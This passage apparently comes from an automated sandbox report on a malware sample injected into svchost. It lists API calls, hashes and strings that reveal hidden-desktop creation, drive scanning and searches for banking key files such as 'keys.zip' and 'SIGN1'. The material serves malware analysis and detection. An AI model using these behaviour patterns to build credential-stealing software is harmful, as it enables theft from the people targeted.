                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0b0319cb903f30aaee89296e4cc31b7d61303c5611d790538c0c254949ea6e6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5811E9B2A413445BDB209E6DECC576AF7ECEB84225F1009BEE949C3640C37199448650
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C88F7E
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1494777729-0
                                                                                                                                                                                                            • Opcode ID: 75b85df2a244b49084cb9c6be1fee03f6b29c8988f75ef377feece3f958ed39b
                                                                                                                                                                                                            • Instruction ID: 3d072e8d0ad7959a8a5fc85f18e2cf0cd3f70cfa6d2a8bf5e3b67d3b8feb11de
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b85df2a244b49084cb9c6be1fee03f6b29c8988f75ef377feece3f958ed39b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AE0E5B6E40259EBCF01DFD8E845E9DB778FB48321F008659F915A7240C735A914CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,02C7FB17,02C7FB03,?,02C87515,?,?,?), ref: 02C82CF1
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02C82CF8
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C82D08
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcessmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 983300431-0
                                                                                                                                                                                                            • Opcode ID: 75dbf35bca06dd830f604bb688404d1911218ff929d5c56889fef34081a0ce2d
                                                                                                                                                                                                            • Instruction ID: e39a6daae8fda8d00c1477b3830d4f8cdadd1efeb8606937784db8c4a3b33ff1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75dbf35bca06dd830f604bb688404d1911218ff929d5c56889fef34081a0ce2d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75E0CD37F4156262C91611197C0CBD76A18CFC1625F254526BE05D71C1EA11C90582B1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040208C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: V,@
                                                                                                                                                                                                            • API String ID: 3664257935-3634209070
                                                                                                                                                                                                            • Opcode ID: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                            • Instruction ID: d15e959a12f23ccec2fe85088e2afbb8a6d817ea7d7d5b015e5417604cfff27a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D05E76E027298BCB20CF94A5052AEF730FB44731F0043AADE257338083351C118AD4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID: bad pack level
                                                                                                                                                                                                            • API String ID: 2221118986-4081416248
                                                                                                                                                                                                            • Opcode ID: b03a042e19552a90dd51a5fb2fc4d94929bf84e8aa32e981ceed3f8ed88e5d73
                                                                                                                                                                                                            • Instruction ID: 37220f5d33abeed525e7f3057d18b49a3e425549acef86b3ea3ab1fe85dddaf4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b03a042e19552a90dd51a5fb2fc4d94929bf84e8aa32e981ceed3f8ed88e5d73
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F731B7F1A047148ED7219FB9D4842E7B7E6FF46360B40493EE1AE96240D379A182CF53
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memcpy.MSVCRT(0001AF70,00022F70,00008000,0001AF70,02C9595C), ref: 02C95B9F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                            • String ID: more < 2
                                                                                                                                                                                                            • API String ID: 3510742995-2484782096
                                                                                                                                                                                                            • Opcode ID: aa88fe5c378baad28afa086cd2a7c9a55f108c18b7cbbb39190229aadf341f3b
                                                                                                                                                                                                            • Instruction ID: fa29d854ba3d9dbdf17571427a6aaa4b2709e4821e4193a9d7567c5dea0ee287
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa88fe5c378baad28afa086cd2a7c9a55f108c18b7cbbb39190229aadf341f3b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E3170F1610E008BDB268BB4C4487E673E6BF8A358F944A3DD06B562D4D738A586CE43
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,00000000,00000068,?,02C974DE,00000068,00000000,00000000,00000000,00000011), ref: 02C972D6
                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00004000,?,00000000,00000000,00000068,?,02C974DE,00000068,00000000,00000000,00000000,00000011), ref: 02C9730C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileReadmemcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1163090680-0
                                                                                                                                                                                                            • Opcode ID: 5e4ab89467c45d4ad976b7c18e4999c846afacf179ef1ccbccb903e84aabe7af
                                                                                                                                                                                                            • Instruction ID: 64d363186c5f4da0c576df7cee4247f317322fc0d375e4a31da46e02b4fe8dde
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e4ab89467c45d4ad976b7c18e4999c846afacf179ef1ccbccb903e84aabe7af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B51154B27117045FDB24CA6ADC84A6BF3EDEFD4714B14882DF546C7A40D631E9058B64
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,02C879AD,6d1da6b7,?,?,?,?,?,?), ref: 02C76A18
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C76A1F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$AttributesDelete
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2910425767-0
                                                                                                                                                                                                            • Opcode ID: b154332f1c2d15c013d7aa7e7efa14e764507d518ea450a32ec213f8197d7345
                                                                                                                                                                                                            • Instruction ID: 7a1a6bb6f11a735d8f4cbb4645dc26e15627a8d3f55c6b75cf830b046884ff24
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b154332f1c2d15c013d7aa7e7efa14e764507d518ea450a32ec213f8197d7345
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B092B1DD2CA26B8F135720590CAAEAA1CEE85B017058A84F901D2001DB288A5186A6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e255b7937325390c97710c5a88782090207b2db64f4130e14b0bf41065bb860b
                                                                                                                                                                                                            • Instruction ID: c1eb1f6e78f9b7a99b1c8aff115ea89d7a60a05768da011316e2f5c980c18fb3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e255b7937325390c97710c5a88782090207b2db64f4130e14b0bf41065bb860b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFF01CB4500200AEEF59CF21C65DF597BE4AB85399F59D0C9E0084F6A2CB39C549DF50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,00000001,00000000), ref: 02C766B7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                            • Opcode ID: f6c50e1ed5c748e22e93158715b2fcabc35f4e39c71c32a3502fd0c458ac892d
                                                                                                                                                                                                            • Instruction ID: d065e3cc96c4392a53a23273d8844df094d0d0f752270670f2b669e4876b59ef
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6c50e1ed5c748e22e93158715b2fcabc35f4e39c71c32a3502fd0c458ac892d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4D0C9B595410CBFE740CB84DD0AFAAB7ECD748701F004299BA08C3240E6B16E109BB6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,02C8CCE2), ref: 02C764C3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02C7C3DF
                                                                                                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02C7C3EA
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C3FD
                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 02C7C412
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C421
                                                                                                                                                                                                            • SetWindowTextA.USER32(?,-00000008), ref: 02C7C42D
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C43C
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C447
                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C45A
                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 02C7C498
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02C7C4A8
                                                                                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C4B7
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02C7C4CF
                                                                                                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 02C7C4D9
                                                                                                                                                                                                            • CreateFontIndirectA.GDI32 ref: 02C7C4EF
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02C7C4FF
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C7C537
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7C53A
                                                                                                                                                                                                            • GetWindowInfo.USER32(00000000,?), ref: 02C7C54E
                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 02C7C5B3
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02C7C5DD
                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 02C7C5E9
                                                                                                                                                                                                            • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02C7C605
                                                                                                                                                                                                            • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02C7C62A
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02C7C63C
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02C7C645
                                                                                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C654
                                                                                                                                                                                                            • GetWindowTextLengthA.USER32(00000000), ref: 02C7C65B
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02C7C66F
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02C7C693
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02C7C6A0
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 02C7C6B0
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000DE), ref: 02C7C6CC
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000F2), ref: 02C7C6D5
                                                                                                                                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 02C7C6E1
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02C7C6FB
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C724
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C733
                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C746
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02C7C769
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02C7C787
                                                                                                                                                                                                            • ShowWindow.USER32(?,00000001), ref: 02C7C794
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C7A3
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7C7BB
                                                                                                                                                                                                              • Part of subcall function 02C7C330: GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
                                                                                                                                                                                                              • Part of subcall function 02C7C330: GetCurrentThreadId.KERNEL32 ref: 02C7C344
                                                                                                                                                                                                              • Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
                                                                                                                                                                                                              • Part of subcall function 02C7C330: SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
                                                                                                                                                                                                              • Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02C7C7C8
                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 02C7C837
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000), ref: 02C7C83E
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C84E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7C868
                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000000), ref: 02C7C87D
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C88C
                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 02C7C898
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7C8A7
                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 02C7C8AE
                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 02C7C8C3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                            • String ID: '$<$P0Wu$static
                                                                                                                                                                                                            • API String ID: 2592195760-2115307949
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateDesktopA.USER32 ref: 02C78711
                                                                                                                                                                                                            • SetThreadDesktop.USER32(00000000), ref: 02C7872A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C78738
                                                                                                                                                                                                            • CreateProcessA.KERNEL32 ref: 02C7877C
                                                                                                                                                                                                            • GetShellWindow.USER32 ref: 02C78788
                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 02C787A2
                                                                                                                                                                                                            • GetShellWindow.USER32 ref: 02C787A4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C787D3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C787E1
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C787FB
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C78809
                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 02C7880F
                                                                                                                                                                                                            • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C78820
                                                                                                                                                                                                            • RegisterWindowMessageA.USER32(92f35800a), ref: 02C78848
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C7885D
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02C788A7
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C788B8
                                                                                                                                                                                                            • CreateProcessA.KERNEL32 ref: 02C78905
                                                                                                                                                                                                            • GetShellWindow.USER32 ref: 02C78911
                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 02C78924
                                                                                                                                                                                                            • GetShellWindow.USER32 ref: 02C78926
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,?), ref: 02C78955
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C78963
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7897D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C7898B
                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 02C78991
                                                                                                                                                                                                            • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C789A2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C789CF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Handle$CreateDesktop$CloseInformationShellThread$FindProcessSleepmemset$MessageRegister
                                                                                                                                                                                                            • String ID: 92f35800a$D$D$Shell_TrayWnd$c:\windows$c:\windows\explorer.exe
                                                                                                                                                                                                            • API String ID: 340731545-2838640940
                                                                                                                                                                                                            • Opcode ID: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
                                                                                                                                                                                                            • Instruction ID: 44ee53593746ed547ee0629c9a9b28ec431908d50eb276aea1e373b7e83b79d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 029148B1988350AFD312DF65D848B5BBBE8EF88754F108F5AF64983240DB748515CFA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C911DE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C911F8
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91222
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C91247
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C91287
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C91291
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C91299
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C912AA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C912B1
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 02C912F4
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02C91340
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718,00000000,00000000), ref: 02C91387
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA718$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                            • API String ID: 1576442920-4172027252
                                                                                                                                                                                                            • Opcode ID: 082f09d6388cbf58c96b8d781d757390221bba64b3a40321ac2578f470d1a12b
                                                                                                                                                                                                            • Instruction ID: 6cf4f9e84f40e98a3ba9a695ee025706ec90e138cbbabd429458fd5191a74a5b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 082f09d6388cbf58c96b8d781d757390221bba64b3a40321ac2578f470d1a12b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6D129309442968FDF168F24D85DBE67BE9EF85304F1886D4E88DD7241DBB1DA48CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8BB47
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8BB69
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8BB88
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02C8BBA1
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
